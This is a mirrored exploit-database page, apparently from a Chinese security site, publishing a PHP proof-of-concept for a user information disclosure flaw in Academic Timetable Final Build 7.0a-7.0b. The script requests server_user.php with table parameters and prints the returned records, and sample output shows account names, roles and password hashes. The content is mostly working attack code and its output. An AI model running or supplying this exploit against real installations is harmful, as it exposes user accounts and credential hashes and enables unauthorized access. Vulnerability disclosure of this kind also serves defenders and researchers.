首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Academic Timetable Final Build 7.0 - Information Disclosure
来源:vfocus.net 作者:Sencan 发布时间:2018-10-16  
<?php
# Exploit Title: Academic Timetable Final Build 7.0a-7.0b - User Information Disclosure
# Dork: N/A
# Date: 2018-10-13
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://geoffpartridge.net/
# Software Link: https://sourceforge.net/projects/timetableacademic/files/latest/download
# Version: 7.0a-7.0b
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
 
# POC:
# 1)
header ('Content-type: text/html; charset=UTF-8');
 
$urlemiz= "http://192.168.1.27/[PATH]/";
$yuk="server_user.php?sEcho=10&iColumns=10&iDisplayStart=0&iDisplayLength=10&sSearch=&bRegex=false&sSearch_0=&bRegex_0=false&bSearchable_0=true&sSearch_1=&bRegex_1=false&bSearchable_1=true&sSearch_2=&bRegex_2=false&bSearchable_2=true&iSortCol_0=0&sSortDir_0=asc&iSortingCols=1&bSortable_0=true&bSearchable_3=0";
$jsonveri = file_get_contents($urlemiz.$yuk);
$ver = json_decode($jsonveri,true);
echo "<pre>\n";
print_r($ver);
echo "\n</pre>";
/**
Array
(
    [sEcho] => 10
    [iTotalRecords] => 3
    [iTotalDisplayRecords] => 3
    [aaData] => Array
        (
            [0] => Array
                (
                    [0] => testdb1
                    [1] => testdb1
                    [2] => ADMIN
                    [3] => *6CC4E8CFFEAF202D7475BC906612F9A29A9C8117
                )
 
            [1] => Array
                (
                    [0] => ADMIN
                    [1] => admin
                    [2] => ADMIN
                    [3] => *4ACFE3202A5FF5CF467898FC58AAB1D615029441
                )
 
            [2] => Array
                (
                    [0] => STAFF
                    [1] => Staff
                    [2] => VIEW
                    [3] =>
                )
 
        )
 
)
 */
?>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·FLIR Brickstream 3D+ - RTSP St
·Any Sound Recorder 2.93 Buffer
·FLIR AX8 Thermal Camera 1.32.1
·Git Submodule Arbitrary Code E
·Snes9K 0.0.9z - Buffer Overflo
·libSSH - Authentication Bypass
·Solaris RSH Stack Clash Privil
·Microsoft Windows SetImeInfoEx
·NoMachine 5.3.26 Remote Code E
·Modbus Poll 7.2.2 - Denial of
·FluxBB < 1.5.6 - SQL Injection
·Microsoft Windows 10 UAC Bypas
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved